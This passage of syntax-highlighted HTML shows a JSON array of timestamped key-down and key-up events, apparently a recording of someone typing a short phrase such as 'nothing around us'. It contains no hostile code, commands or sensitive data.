class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7477.275</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7477.5</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7478</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7557.17</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7557.385</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span 
class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7557.94</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7588.785</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7589.005</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7598.42</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7638.385</span><span class="p">],[</span><span 
class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7638.625</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7639.2</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7677.26</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7677.46</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyT"</span><span class="p">,</span><span class="s2">"t"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">7677.875</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7700.72</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7700.92</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyH"</span><span class="p">,</span><span class="s2">"h"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7701.465</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7789.075</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7789.31</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7789.96</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7845.03</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7845.26</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7845.695</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span 
class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7916.815</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7917.045</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyI"</span><span class="p">,</span><span class="s2">"i"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7917.645</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7918.16</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7929.995</span><span class="p">],[</span><span 
class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">7930.395</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8012.685</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8012.895</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8013.475</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">8068.8</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8069</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyG"</span><span class="p">,</span><span class="s2">"g"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8069.425</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8349.005</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8349.215</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8360.745</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8397.33</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8397.67</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8398.28</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8445.02</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span 
class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8445.225</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8445.65</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8493.105</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8493.385</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8493.975</span><span class="p">],[</span><span 
class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8516.82</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8517.05</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyO"</span><span class="p">,</span><span class="s2">"o"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8517.61</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8518.105</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">8518.53</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8518.835</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8533</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8533.19</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyA"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8533.61</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8549.085</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8564.805</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyR"</span><span class="p">,</span><span class="s2">"r"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8565.32</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8638.355</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8638.68</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span 
class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8639.465</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8717.045</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8717.29</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8717.725</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8796.75</span><span class="p">],[</span><span 
class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8796.99</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyN"</span><span class="p">,</span><span class="s2">"n"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8814.205</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8884.74</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8884.94</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyD"</span><span class="p">,</span><span class="s2">"d"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span 
class="mf">1</span><span class="p">,</span><span class="mf">8885.375</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8973.165</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8973.44</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">8973.97</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9052.815</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span 
class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9053.055</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyU"</span><span class="p">,</span><span class="s2">"u"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9053.535</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9068.72</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9069.175</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9069.55</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span 
class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9133.025</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9133.275</span><span class="p">],[</span><span class="s2">"kd"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9133.715</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9173</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9173.215</span><span class="p">],[</span><span 
class="s2">"ku"</span><span class="p">,</span><span class="s2">"KeyS"</span><span class="p">,</span><span class="s2">"s"</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9173.73</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9212.76</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span class="s2">"Space"</span><span class="p">,</span><span class="s2">" "</span><span class="p">,</span><span class="mf">0</span><span class="p">,</span><span class="kc">false</span><span class="p">,</span><span class="s2">"0000"</span><span class="p">,</span><span class="mf">1</span><span class="p">,</span><span class="mf">9225.385</span><span class="p">],[</span><span class="s2">"ku"</span><span class="p">,</span><span 